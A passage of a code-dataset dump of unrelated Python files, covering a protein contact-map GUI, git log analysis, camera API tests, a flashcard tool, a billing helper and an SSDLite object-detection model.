EncoderDecoder()\n self.root = root\n\n self.left_frame = Frame(root)\n left_frame = self.left_frame\n\n self.right_frame = Frame(root)\n\n self.pdb1_file = StringVar()\n self.pdb2_file = StringVar()\n self.cmo_message = StringVar()\n self.similarity_message = StringVar()\n self.cliquer_sol_message = StringVar()\n self.pdbs_contact_count = StringVar()\n\n self.button_pdb1 = Button(left_frame, text=\"Load first pdb...\", command=self.button_pdb1_callback)\n self.button_pdb2 = Button(left_frame, text=\"Load second pdb...\", command=self.button_pdb2_callback)\n\n self.label_pdb1_name = Label(left_frame, textvariable=self.pdb1_file)\n self.label_pdb2_name = Label(left_frame, textvariable=self.pdb2_file)\n\n\n self.label_pdb1_contact = Label(left_frame, text=\"First pdb contact distance:\")\n self.label_pdb2_contact = Label(left_frame, text=\"Second pdb contact distance:\")\n self.label_pop_size = Label(left_frame, text=\"Population size:\")\n self.label_generation_count = Label(left_frame, text=\"Number of generations:\")\n self.label_mutation_rate = Label(left_frame, text=\"Mutation rate:\")\n self.label_individual_mutation_rate = Label(left_frame, text=\"Individual mutation prob:\")\n self.label_cutpoint = Label(left_frame, text=\"Crossover cutpoint count:\")\n\n self.button_get_contact_map_overlap = Button(left_frame, text=\"Generate CMO\", command = self.button_get_contact_map_overlap_callback)\n self.label_get_cmo = Label(left_frame, textvariable = self.cmo_message)\n\n self.vcmd = (left_frame.register(self.validate),\n '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')\n\n self.text_pdb1_contact = Entry(left_frame, text=\"First pdb contact distance:\", validate = 'key', validatecommand = self.vcmd)\n self.text_pdb2_contact = Entry(left_frame, text=\"Second pdb contact distance:\", validate = 'key', validatecommand = self.vcmd)\n self.text_pop_size = Entry(left_frame, text=\"Population size:\", validate = 'key', validatecommand = self.vcmd)\n self.text_generation_count = Entry(left_frame, text=\"Number of generations:\", validate = 'key', validatecommand = self.vcmd)\n self.text_mutation_rate = Entry(left_frame, text=\"Mutation rate:\", validate = 'key', validatecommand = self.vcmd)\n self.text_individual_mutation_rate = Entry(left_frame, text=\"Individual mutation_prob:\", validate='key', validatecommand = self.vcmd)\n self.text_cutpoint = Entry(left_frame, text=\"Cutpoint:\", validate='key', validatecommand = self.vcmd)\n\n\n self.left_frame.grid(row=0, column = 0)\n self.button_pdb1.grid(row=0, column=0) \n self.button_pdb2.grid(row=0, column=1)\n\n self.label_pdb1_name.grid(row=1, column=0)\n self.label_pdb2_name.grid(row=1, column=1)\n\n\n\n self.label_pdb1_contact.grid(row=2, column=0, sticky='E')\n self.label_pdb2_contact.grid(row=3, column=0, sticky='E')\n self.label_pop_size.grid(row=4, column=0, sticky='E')\n self.label_generation_count.grid(row=5, column=0, sticky='E')\n self.label_mutation_rate.grid(row=6, column=0, sticky='E')\n self.label_individual_mutation_rate.grid(row=7, column=0, sticky='E')\n self.label_cutpoint.grid(row=8, column=0, sticky='E')\n\n self.text_pdb1_contact.grid(row=2, column=1, sticky='E')\n self.text_pdb2_contact.grid(row=3, column=1, sticky='E')\n self.text_pop_size.grid(row=4, column=1, sticky='E')\n self.text_generation_count.grid(row=5, column=1, sticky='E')\n self.text_mutation_rate.grid(row=6, column=1, sticky='E')\n self.text_individual_mutation_rate.grid(row=7, column=1, sticky='E')\n self.text_cutpoint.grid(row=8, column=1, sticky='E')\n self.button_get_contact_map_overlap.grid(row=9, column=0)\n self.label_get_cmo.grid(row=9, column =1)\n\n \n self.right_frame.grid(row = 0, column = 1)\n self.cmo_node_edge_count = StringVar()\n self.label_cmo_count = Label(self.right_frame, textvariable = self.cmo_node_edge_count)\n self.label_cmo_count.grid(row=0, column = 0)\n self.button_run_cliquer = Button(self.right_frame, text=\"Run cliquerGA\", command = self.run_cliquer_command)\n self.button_run_cliquer.grid(row=1, column=0)\n self.label_cm_count = Label(self.right_frame, textvariable = self.pdbs_contact_count)\n self.label_cm_count.grid(row=2, column=0)\n self.label_similarity = Label(self.right_frame, textvariable = self.similarity_message)\n self.label_similarity.grid(row=4, column=0)\n\n\n\n def run_cliquer_async(self):\n self.sol_size, self.sol = (self.encoder.run_cliquer(\n int(self.text_pop_size.get()),\n int(self.text_generation_count.get()),\n float(self.text_mutation_rate.get()),\n float(self.text_individual_mutation_rate.get()),\n int(self.text_cutpoint.get())\n ))\n\n self.similarity_message.set(\"Similarity = %s\"%str((2*self.sol_size)/(self.pdb1_contact_count+self.pdb2_contact_count)))\n\n\n def run_cliquer_command(self):\n t = Thread(target = self.run_cliquer_async)\n t.start()\n\n\n def get_cmo_async(self):\n self.nodes, self.edges, self.pdb1_contact_count, self.pdb2_contact_count = self.encoder.get_cmo(self.pdb1_file.get(), self.pdb2_file.get(), float(self.text_pdb1_contact.get()), float(self.text_pdb2_contact.get()))\n self.cmo_message.set(\"Done with CMO\")\n edge_count = sum([len(x) for x in self.edges.values()])//2\n self.cmo_node_edge_count.set(\"CMO Node count: %s; Edge count: %s\"%(len(self.nodes), edge_count))\n self.pdbs_contact_count.set(\"Contacts: first-%d contacts\\nsecond-%d contacts\"%(self.pdb1_contact_count, self.pdb2_contact_count) )\n\n\n def button_get_contact_map_overlap_callback(self):\n self.similarity_message.set(\"\")\n t = Thread(target=self.get_cmo_async)\n t.start()\n\n def button_pdb1_callback(self):\n self.pdb1_file.set(filedialog.askopenfilename(initialdir = \".\", title=\"Select file\", filetypes = ((\"all files \", \"*.*\"),)))\n\n\n def button_pdb2_callback(self):\n self.pdb2_file.set(filedialog.askopenfilename(initialdir = \".\", title=\"Select file\", filetypes = ((\"all files \", \"*.*\"),)))\n\n @staticmethod\n def validate(action, index, value_if_allowed,\n prior_value, text, validation_type, trigger_type, widget_name):\n \n if text in '0123456789.-+':\n if len(text) == 1:\n return True\n try:\n float(value_if_allowed)\n return True\n except ValueError:\n return False\n else:\n return False\n \n\n\n\nif __name__ == \"__main__\":\n root = Tk()\n gui = GUI(root)\n root.mainloop()\n","sub_path":"cliquer/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587811449","text":"from config import Config\nfrom scripts.operations.file_operations import FileOperations\nimport os\nimport glob\nimport re\n\t\t\t\n\n\n#For finding out the number of Log related changes and Non Log related changes from the last 10 changes of the repos\nclass LogVsNlog:\n\n\t#Git log helps in extracting the entire changes in one go\n\tdef gitchanges():\n\t\tpaths = [f\"{Config.datascience}*/\", f\"{Config.nondatascience}*/\"]\n\t\tfor path in paths:\n\t\t\tfor folder in glob.glob(path, recursive = True):\n\t\t\t\treponame = folder.split('/')[-2]\n\t\t\t\tos.system(f\"git --git-dir={folder}.git log -10 -p '*.py' | grep '^[+-]' | grep -Ev '^(--- a/|\\+\\+\\+ b/)'> {Config.logvnlog}{reponame}.txt\")\n\n\t#changes json for adding the data to the final format\n\tdef changesjson():\n\t\tpath = f\"{Config.logvnlog}*.txt\"\n\t\tlogvsnlog_changes = {}\n\t\tfor repo_changes in glob.glob(path, recursive=True):\n\t\t\tlog_lines = []\n\t\t\ttotal_lines, logc = 0, 0\n\t\t\tname = repo_changes.split('/')[-1]\n\t\t\twith open(repo_changes) as rc:\n\t\t\t\tfor line in rc:\n\t\t\t\t\ttotal_lines += 1\n\t\t\t\t\ttemp_line = line[1:].strip()\n\t\t\t\t\tif len(temp_line)!=0:\n\t\t\t\t\t\tregexList = ['^print', 'io\\.', '^trace\\.', '^traceback\\.', 'logging\\.', '^sys\\.stderr\\.write', '.*\\.write']\n\t\t\t\t\t\tfor regex in regexList:\n\t\t\t\t\t\t\ts = re.search(regex,temp_line)\n\t\t\t\t\t\t\tif s:\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tlog_lines.append(temp_line)\n\t\t\t\t\t\t\t\tlogc += 1\n\t\t\t\t\t\t\t\tbreak\n\t\t\tlogvsnlog_changes[name.split('.')[0]] = {'logchanges' : logc, 'nonlogchanges' : total_lines-logc, 'log_lines' : log_lines}\n\t\tFileOperations.json.save_json(logvsnlog_changes, f\"{Config.root}{Config.logvnlog}logvsnlog_changes.json\")\n","sub_path":"scripts/logging/logvnlog.py","file_name":"logvnlog.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216757487","text":"chars = list('|eanriosltumdkhgBcSMjHbKJRvpADVWPLGywfCT Ez-NFOZIxYqUéöäXQá\\'üë.óíø')\nnormalCharByChar = {}\non = 1\noff = 0\nnonchar = [off] * len(chars)\n\nfor char in chars:\n normal = [on if char == char2 else off for char2 in chars]\n normalCharByChar[char] = normal\n\ndef createNormalizr(maxWordLen):\n def normalizeText(text_):\n text = text_.ljust(maxWordLen, '$') # any non char\n normal = [normalCharByChar[char] if char in normalCharByChar else nonchar for char in text]\n return normal\n\n return normalizeText\n","sub_path":"src/normalizr.py","file_name":"normalizr.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282243509","text":"import threading\nimport time\nimport queue\n\nqueue = queue.Queue()\n\ndef put_data_in_queue():\n for i in range(100):\n queue.put(i)\n\nclass MyThread(threading.Thread):\n def run(self):\n while not queue.empty():\n #sleep_times = queue.get()\n time.sleep(3)\n \n #print(queue.get())\n myCrawler = MyCrawler(\"https://www.aitaotu.com/tag/chizuzhe.html\")\n myCrawler.test1()\n queue.task_done()\n\nclass MyCrawler:\n def __init__(self,seeds):\n print(seeds)\n \n def main_function(self):\n threads_num = 4\n put_data_in_queue()\n while True:\n for i in range(threads_num):\n myThread = MyThread()\n myThread.setDaemon(True)\n myThread.start()\n queue.join()\n time.sleep(3)\n \n def test1(self):\n print(\"1112121\")\n\nif __name__==\"__main__\":\n myCrawler = MyCrawler(\"https://www.aitaotu.com/tag/chizuzhe.html\")\n myCrawler.main_function()\n print('over')\n","sub_path":"src/test_threading2.py","file_name":"test_threading2.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13049359","text":"\"\"\"Test Axis VMD4 API.\n\npytest --cov-report term-missing --cov=axis.vmd4 tests/test_vmd4.py\n\"\"\"\n\nfrom asynctest import Mock\nimport pytest\n\nfrom axis.applications.vmd4 import Vmd4\n\n\n@pytest.fixture\ndef vmd4() -> Vmd4:\n \"\"\"Returns the vmd4 mock object.\"\"\"\n mock_request = Mock()\n mock_request.return_value = \"\"\n return Vmd4(mock_request)\n\n\ndef test_get_empty_configuration(vmd4):\n \"\"\"Test empty get_configuration\"\"\"\n vmd4._request.return_value = response_get_configuration_empty\n vmd4.update()\n vmd4._request.assert_called_with(\n \"post\",\n \"/local/vmd/control.cgi\",\n json={\n \"method\": \"getConfiguration\",\n \"apiVersion\": \"1.2\",\n \"context\": \"Axis library\",\n },\n )\n\n assert len(vmd4.values()) == 0\n\n\ndef test_get_configuration(vmd4):\n \"\"\"Test get_supported_versions\"\"\"\n vmd4._request.return_value = response_get_configuration\n vmd4.update()\n vmd4._request.assert_called_with(\n \"post\",\n \"/local/vmd/control.cgi\",\n json={\n \"method\": \"getConfiguration\",\n \"apiVersion\": \"1.2\",\n \"context\": \"Axis library\",\n },\n )\n\n assert len(vmd4.values()) == 1\n\n vmd4 = vmd4[\"Camera1Profile1\"]\n assert vmd4.id == \"Camera1Profile1\"\n assert vmd4.name == \"Profile 1\"\n assert vmd4.camera == 1\n assert vmd4.uid == 1\n assert vmd4.triggers == [\n {\n \"type\": \"includeArea\",\n \"data\": [[-0.97, -0.97], [-0.97, 0.97], [0.97, 0.97], [0.97, -0.97],],\n }\n ]\n assert vmd4.filters == [\n {\"data\": 1, \"active\": True, \"type\": \"timeShortLivedLimit\"},\n {\"data\": 5, \"active\": True, \"type\": \"distanceSwayingObject\"},\n {\"data\": [5, 5], \"active\": True, \"type\": \"sizePercentage\"},\n ]\n\n\ndef test_get_configuration_error(vmd4):\n \"\"\"Test empty get_configuration.\n\n _request returns an empty dict on error.\n \"\"\"\n vmd4._request.return_value = {}\n vmd4.update()\n vmd4._request.assert_called_with(\n \"post\",\n \"/local/vmd/control.cgi\",\n json={\n \"method\": \"getConfiguration\",\n \"apiVersion\": \"1.2\",\n \"context\": \"Axis library\",\n },\n )\n\n assert len(vmd4.values()) == 0\n\n\nresponse_get_configuration_empty = {\n \"apiVersion\": \"1.4\",\n \"method\": \"getConfiguration\",\n \"context\": \"Axis library\",\n \"data\": {\n \"cameras\": [{\"id\": 1, \"rotation\": 0, \"active\": True}],\n \"configurationStatus\": 26,\n \"profiles\": [],\n },\n}\n\n\nresponse_get_configuration = {\n \"apiVersion\": \"1.4\",\n \"method\": \"getConfiguration\",\n \"context\": \"Axis library\",\n \"data\": {\n \"cameras\": [{\"id\": 1, \"rotation\": 0, \"active\": True}],\n \"configurationStatus\": 2,\n \"profiles\": [\n {\n \"filters\": [\n {\"data\": 1, \"active\": True, \"type\": \"timeShortLivedLimit\"},\n {\"data\": 5, \"active\": True, \"type\": \"distanceSwayingObject\"},\n {\"data\": [5, 5], \"active\": True, \"type\": \"sizePercentage\"},\n ],\n \"camera\": 1,\n \"triggers\": [\n {\n \"type\": \"includeArea\",\n \"data\": [\n [-0.97, -0.97],\n [-0.97, 0.97],\n [0.97, 0.97],\n [0.97, -0.97],\n ],\n }\n ],\n \"name\": \"Profile 1\",\n \"uid\": 1,\n }\n ],\n },\n}\n\nresponse_get_configuration_error = {\n \"apiVersion\": \"1.1\",\n \"method\": \"getConfiguration\",\n \"context\": \"Axis library\",\n \"error\": {\n \"code\": \"2000\",\n \"message\": \"The requested version of the application is not supported.\",\n },\n}\n\n","sub_path":"tests/applications/test_vmd4.py","file_name":"test_vmd4.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14910450","text":"from db import DBWorker\n\n\nclass Memo:\n def menu_constructor(self):\n main_menu = Menu('main', back=True)\n add_menu = Menu('add', master=main_menu, back=True)\n\n main_add = Menu('Add flashcards', callback=add_menu)\n main_practice = Menu('Practice flashcards', master=main_menu, callback=Flashcards.practice)\n main_exit = Menu('Exit', callback=self.exit_)\n\n add_menu_add = Menu('Add a new flashcard', master=add_menu, callback=Flashcards.add_new)\n add_menu_exit = Menu('Exit', callback=main_menu)\n\n main_menu.add_options(main_add, main_practice, main_exit)\n add_menu.add_options(add_menu_add, add_menu_exit)\n\n main_menu()\n\n @staticmethod\n def exit_() -> None:\n print('Bye!')\n exit()\n\n\nclass Menu:\n def __init__(self, name: str, options: list = None, master=None, callback=None, back: bool = False) -> None:\n self.options = options if options is not None else []\n self.name = name\n self.master = master\n self.callback = callback\n self.back = back\n\n def __call__(self) -> None:\n if self.callback:\n if isinstance(self.callback, (list, tuple)):\n self.callback[0](*self.callback[1::])\n elif callable(self.callback):\n self.callback()\n else:\n raise ValueError(\"Callback is not a list, tuple or callable\")\n if self.options:\n for i, option in enumerate(self.options, start=1):\n print(f\"{i}. {option.name}\")\n allowed = tuple(str(i) for i in range(1, len(self.options) + 1))\n user_choice = check_input(proper_values=allowed, message='is not an option', back=self.back)\n if not user_choice:\n self()\n self.options[int(user_choice) - 1]()\n if self.master:\n self.master()\n\n def add_options(self, *options):\n self.options += options\n\n\nclass Flashcards:\n @staticmethod\n def add_new() -> None:\n question, answer = None, None\n while not question:\n question = input('Question:\\n')\n while not answer:\n answer = input('Answer:\\n')\n DBWorker.add(question, answer)\n\n @staticmethod\n def practice() -> None:\n rows = DBWorker.get_all()\n if not rows:\n print('There is no flashcard to practice!')\n return\n\n for row in rows:\n allowed = ('y', 'n', 'u')\n input_text = 'press \"y\" to see the answer:\\npress \"n\" to skip:\\npress \"u\" to update:\\n'\n print('Question:', row.question)\n user_choice = check_input(input_text, proper_values=allowed, message='is not an option')\n if user_choice == 'u':\n Flashcards.change(row)\n continue\n elif user_choice == 'y':\n print('Answer:', row.answer, '\\n')\n\n Flashcards.learning(row)\n\n @staticmethod\n def learning(row):\n allowed = ('y', 'n')\n input_text = 'press \"y\" if your answer is correct:\\npress \"n\" if your answer is wrong:\\n'\n user_choice = check_input(input_text, proper_values=allowed, message='is not an option')\n if user_choice == 'y':\n DBWorker.session(row, row.session + 1)\n else:\n DBWorker.session(row, 1)\n\n @staticmethod\n def change(row):\n allowed = ('d', 'e')\n input_text = 'press \"d\" to delete the flashcard:\\npress \"e\" to edit the flashcard:\\n'\n user_choice = check_input(input_text, proper_values=allowed, message='is not an option')\n if user_choice == 'e':\n Flashcards.edit(row)\n if user_choice == 'd':\n DBWorker.delete(row)\n\n @staticmethod\n def edit(row):\n print('current question:', row.question)\n question = input('please write a new question:\\n')\n if not question:\n question = row.question\n print('current answer:', row.answer)\n answer = input('please write a new answer:\\n')\n if not answer:\n answer = row.answer\n DBWorker.edit(row, question, answer)\n\n\ndef check_input(*args, proper_values: tuple = None, message: str = None, back: bool = False, **kwargs):\n if proper_values is None:\n raise ValueError()\n while True:\n raw = input(*args, **kwargs)\n if raw not in proper_values:\n if message:\n print(raw, message)\n if back:\n return\n else:\n return raw\n\n\nif __name__ == '__main__':\n Memo().menu_constructor()\n","sub_path":"tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"61714640","text":"from myproject.student.models import *\nfrom myproject.bill.models import *\nimport locale\nfrom django.db.models import Max,Sum\n\nimport random\n\ndef getrandom(k):\n u = ''\n for m in range(1):\n k = random.randint(1,k)\n u += str(k)\n return u\n\n\ndef printbill(admno,session,term):\n bill_list = []\n studata = Student.objects.get(admitted_session = session, admissionno = admno, gone = False)\n varrid2 = 0\n getaddbill = ''\n billlist = []\n klass = studata.admitted_class\n st=studata.dayboarding\n\n if tblbill.objects.filter(klass = klass, term = term, dayboarding = st).count() == 0:\n varrid = 0\n else:\n getbill = tblbill.objects.filter(klass = klass, term = term, dayboarding = st)\n varrid1 = tblbill.objects.filter(klass = klass, term = term, dayboarding = st).aggregate(Sum('billamount'))\n varrid1 = tblbill.objects.filter(klass = klass, term = term, dayboarding = st).aggregate(Sum('billamount'))\n varrid = varrid1['billamount__sum']\n for j in getbill:\n billdic = {'desc': j.desc,'billamount': j.billamount}# locale.format('%.2f', j.billamount, grouping = True) }\n billlist.append(billdic)\n\n if tbladditionalbill.objects.filter(session = session, admissionno = admno, klass = klass, term = term).count() == 0:\n varrid2 = 0\n getaddbill = ''\n else:\n getaddbill = tbladditionalbill.objects.filter(session = session, admissionno = admno, klass = klass, term = term)\n varrid11 = tbladditionalbill.objects.filter(session = session, admissionno = admno, klass = klass, term = term).aggregate(Sum('billamount'))\n varrid2 = varrid11['billamount__sum']\n for h in getaddbill:\n billdic = {\n 'desc': h.desc,\n 'billamount': h.billamount }# locale.format('%.2f', h.billamount, grouping = True) }\n billlist.append(billdic)\n\n varrid = varrid + varrid2\n\n billdic = {\n 'student': st,\n 'bill': billlist,\n 'totalbill': varrid } # locale.format('%.2f', varrid, grouping = True) }\n bill_list.append(billdic)\n\n #return bill_list\n return locale.format('%.0f', varrid)\n\n\n\n","sub_path":"bill/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164745443","text":"import datetime\nimport importlib\nfrom decimal import Decimal\n\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\ndef load_class(path):\n try:\n module_path, _, class_name = path.rpartition(\".\")\n module = importlib.import_module(module_path)\n return getattr(module, class_name)\n except AttributeError:\n raise ImportError(\"Module '%s' doesn't have a class named '%s'.\" % (\n module_path, class_name,\n ))\n\n\ndef load_middleware(path_or_obj):\n if isinstance(path_or_obj, str):\n return load_class(path_or_obj)()\n return path_or_obj\n\nclass DateDecimalJSONEncoder(DjangoJSONEncoder):\n def default(self, o):\n if isinstance(o, Decimal):\n return float(o)\n if isinstance(o, datetime.datetime) or isinstance(o, datetime.date):\n return o.isoformat()\n return super().default(o)\n","sub_path":"django_dramatiq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327064101","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\n\nfrom module.model.mobilenet import mobilenet_v2,mobilenet_v2_075, mobilenet_v2_050,mobilenet_v2_025\nfrom module.functions import PriorBox\nfrom module.loss import L2Norm,MultiBoxLoss\n\n\nimport os\n\n\n\n\nclass SSDLite(nn.Module):\n \"\"\"Single Shot Multibox Architecture for embeded system\n See: https://arxiv.org/pdf/1512.02325.pdf & \n https://arxiv.org/pdf/1801.04381.pdf for more details.\n\n Args:\n phase: (string) Can be \"eval\" or \"train\" or \"feature\"\n base: base layers for input\n extras: extra layers that feed to multibox loc and conf layers\n head: \"multibox head\" consists of loc and conf conv layers\n feature_layer: the feature layers for head to loc and conf\n num_classes: num of classes \n \"\"\"\n\n def __init__(self, cfg,base, extras, head, feature_layer, priorbox,num_classes):\n super(SSDLite, self).__init__()\n self.priorbox = priorbox\n with torch.no_grad():\n self.priors = self.priorbox.forward()\n self.num_classes = num_classes\n # SSD network\n self.base = nn.ModuleList(base)\n self.norm = L2Norm(feature_layer[1][0], 20)\n self.extras = nn.ModuleList(extras)\n\n self.loc = nn.ModuleList(head[0])\n self.conf = nn.ModuleList(head[1])\n self.softmax = nn.Softmax(dim=-1)\n\n self.feature_layer = feature_layer[0]\n self.criterion = MultiBoxLoss(cfg, self.priors)\n \n\n def forward(self, x, targets=None,phase='train'):\n \"\"\"Applies network layers and ops on input image(s) x.\n\n Args:\n x: input image or batch of images. Shape: [batch,3,300,300].\n\n Return:\n Depending on phase:\n test:\n Variable(tensor) of output class label predictions,\n confidence score, and corresponding location predictions for\n each object detected. Shape: [batch,topk,7]\n\n train:\n list of concat outputs from:\n 1: confidence layers, Shape: [batch*num_priors,num_classes]\n 2: localization layers, Shape: [batch,num_priors*4]\n\n feature:\n the features maps of the feature extractor\n \"\"\"\n sources = list()\n loc = list()\n conf = list()\n\n # apply bases layers and cache source layer outputs\n for k in range(len(self.base)):\n x = self.base[k](x)\n if k in self.feature_layer:\n if len(sources) == 0:\n s = self.norm(x)\n sources.append(s)\n else:\n sources.append(x)\n\n # apply extra layers and cache source layer outputs\n for k, v in enumerate(self.extras):\n x = F.relu(v(x), inplace=True)\n sources.append(x)\n # if k % 2 == 1:\n # sources.append(x)\n\n if phase == 'feature':\n return sources\n\n # apply multibox head to source layers\n for (x, l, c) in zip(sources, self.loc, self.conf):\n loc.append(l(x).permute(0, 2, 3, 1).contiguous())\n conf.append(c(x).permute(0, 2, 3, 1).contiguous())\n loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)\n conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)\n print(phase)\n\n if phase == 'eval':\n output = (\n loc.view(loc.size(0), -1, 4), # loc preds\n self.softmax(conf.view(-1, self.num_classes)), # conf preds\n )\n elif phase == 'train':\n output = (\n loc.view(loc.size(0), -1, 4),\n conf.view(conf.size(0), -1, self.num_classes),\n )\n loss_l, loss_c = self.criterion(output, targets)\n #print(loss_l.shape,loss_c.shape)\n return loss_l, loss_c\n else:\n output = (\n loc.view(loc.size(0), -1, 4),\n conf.view(conf.size(0), -1, self.num_classes),\n )\n return output\n\ndef add_extras(base, feature_layer, mbox, num_classes):\n extra_layers = []\n loc_layers = []\n conf_layers = []\n in_channels = None\n for layer, depth, box in zip(feature_layer[0], feature_layer[1], mbox):\n if layer == 'S':\n extra_layers += [ _conv_dw(in_channels, depth, stride=2, padding=1, expand_ratio=1) ]\n in_channels = depth\n elif layer == '':\n extra_layers += [ _conv_dw(in_channels, depth, stride=1, expand_ratio=1) ]\n in_channels = depth\n else:\n in_channels = depth\n loc_layers += [nn.Conv2d(in_channels, box * 4, kernel_size=3, padding=1)]\n conf_layers += [nn.Conv2d(in_channels, box * num_classes, kernel_size=3, padding=1)]\n return base, extra_layers, (loc_layers, conf_layers)\n\n# based on the implementation in https://github.com/tensorflow/models/blob/master/research/object_detection/models/feature_map_generators.py#L213\n# when the expand_ratio is 1, the implemetation is nearly same. Since the shape is always change, I do not add the shortcut as what mobilenetv2 did.\ndef _conv_dw(inp, oup, stride=1, padding=0, expand_ratio=1):\n return nn.Sequential(\n # pw\n nn.Conv2d(inp, oup * expand_ratio, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup * expand_ratio),\n nn.ReLU6(inplace=True),\n # dw\n nn.Conv2d(oup * expand_ratio, oup * expand_ratio, 3, stride, padding, groups=oup * expand_ratio, bias=False),\n nn.BatchNorm2d(oup * expand_ratio),\n nn.ReLU6(inplace=True),\n # pw-linear\n nn.Conv2d(oup * expand_ratio, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\ndef build_ssd_lite(cfg):\n #base = cfg.MODEL.NETS\n base = mobilenet_v2\n feature_maps = [(19, 19), (10, 10), (5, 5), (3, 3), (2, 2), (1, 1)] \n number_box= [2*len(aspect_ratios) if isinstance(aspect_ratios[0], int) else len(aspect_ratios) for aspect_ratios in cfg.MODEL.ASPECT_RATIOS] \n\n base_, extras_, head_ = add_extras(base(), cfg.MODEL.FEATURE_LAYER,number_box, cfg.MODEL.NUM_CLASSES)\n\n priorbox = PriorBox(image_size=cfg.MODEL.IMAGE_SIZE, feature_maps=feature_maps, aspect_ratios=cfg.MODEL.ASPECT_RATIOS, \n scale=cfg.MODEL.SIZES, archor_stride=cfg.MODEL.STEPS, clip=cfg.MODEL.CLIP)\n return SSDLite(cfg.MATCHER,base_, extras_, head_, cfg.MODEL.FEATURE_LAYER, priorbox,cfg.MODEL.NUM_CLASSES)\n\n\ndef save_checkpoints(epochs, iters=None):\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n if iters:\n filename = self.checkpoint_prefix + '_epoch_{:d}_iter_{:d}'.format(epochs, iters) + '.pth'\n else:\n filename = self.checkpoint_prefix + '_epoch_{:d}'.format(epochs) + '.pth'\n filename = os.path.join(self.output_dir, filename)\n torch.save(model.state_dict(), filename)\n with open(os.path.join(output_dir, 'checkpoint_list.txt'), 'a') as f:\n f.write('epoch {epoch:d}: {filename}\\n'.format(epoch=epochs, filename=filename))\n print('Wrote snapshot to: {:s}'.format(filename))\n\n# TODO: write relative cfg under the same page\ndef resume_checkpoint(model,resume_checkpoint, resume_scope):\n if resume_checkpoint == '' or not os.path.isfile(resume_checkpoint):\n print((\"=> no checkpoint found at '{}'\".format(resume_checkpoint)))\n return False\n print((\"=> loading checkpoint '{:s}'\".format(resume_checkpoint)))\n checkpoint = torch.load(resume_checkpoint)\n\n # print(\"=> Weigths in the checkpoints:\")\n # print([k for k, v in list(checkpoint.items())])\n\n # remove the module in the parrallel model\n if 'module.' in list(checkpoint.items())[0][0]:\n pretrained_dict = {'.'.join(k.split('.')[1:]): v for k, v in list(checkpoint.items())}\n checkpoint = pretrained_dict\n\n \n #resume_scope = self.cfg.TRAIN.RESUME_SCOPE\n # extract the weights based on the resume scope\n if resume_scope != '':\n pretrained_dict = {}\n #print(list(checkpoint.items))\n for k, v in list(checkpoint.items()):\n #print(k,'***start***')\n for resume_key in resume_scope.split(','):\n if resume_key in k:\n pretrained_dict[k] = v\n #print(pretrained_dict[k])\n break\n # else:\n # print(k)\n # print('***end***')\n \n checkpoint = pretrained_dict\n\n pretrained_dict = {k: v for k, v in checkpoint.items() if k in model.state_dict()}\n # print(\"=> Resume weigths:\")\n # print([k for k, v in list(pretrained_dict.items())])\n\n checkpoint = model.state_dict()\n\n unresume_dict = set(checkpoint)-set(pretrained_dict)\n if len(unresume_dict) != 0:\n print(\"=> UNResume weigths:\")\n print(unresume_dict)\n\n checkpoint.update(pretrained_dict)\n model.load_state_dict(checkpoint)\n\n return model\n\n\ndef find_previous(output_dir):\n if not os.path.exists(os.path.join(output_dir, 'checkpoint_list.txt')):\n return False\n with open(os.path.join(output_dir, 'checkpoint_list.txt'), 'r') as f:\n lineList = f.readlines()\n epoches, resume_checkpoints = [list() for _ in range(2)]\n for line in lineList:\n epoch = int(line[line.find('epoch ') + len('epoch '): line.find(':')])\n checkpoint = line[line.find(':') + 2:-1]\n epoches.append(epoch)\n resume_checkpoints.append(checkpoint)\n return epoches, resume_checkpoints\n\ndef weights_init(m):\n for key in m.state_dict():\n if key.split('.')[-1] == 'weight':\n if 'conv' in key:\n init.kaiming_normal(m.state_dict()[key], mode='fan_out')\n if 'bn' in key:\n m.state_dict()[key][...] = 1\n elif key.split('.')[-1] == 'bias':\n m.state_dict()[key][...] = 0\n\n\n\ndef trainable_param(model,trainable_scope):\n for param in model.parameters():\n param.requires_grad = False\n\n trainable_param = []\n for module in trainable_scope.split(','):\n if hasattr(model, module):\n # print(getattr(self.model, module))\n for param in getattr(model, module).parameters():\n param.requires_grad = True\n trainable_param.extend(getattr(model, module).parameters())\n\n return trainable_param\n\n\ndef configure_optimizer(trainable_param, cfg):\n if cfg.OPTIMIZER == 'sgd':\n optimizer = optim.SGD(trainable_param, lr=cfg.LEARNING_RATE,\n momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY)\n elif cfg.OPTIMIZER == 'rmsprop':\n optimizer = optim.RMSprop(trainable_param, lr=cfg.LEARNING_RATE,\n momentum=cfg.MOMENTUM, alpha=cfg.MOMENTUM_2, eps=cfg.EPS, weight_decay=cfg.WEIGHT_DECAY)\n elif cfg.OPTIMIZER == 'adam':\n optimizer = 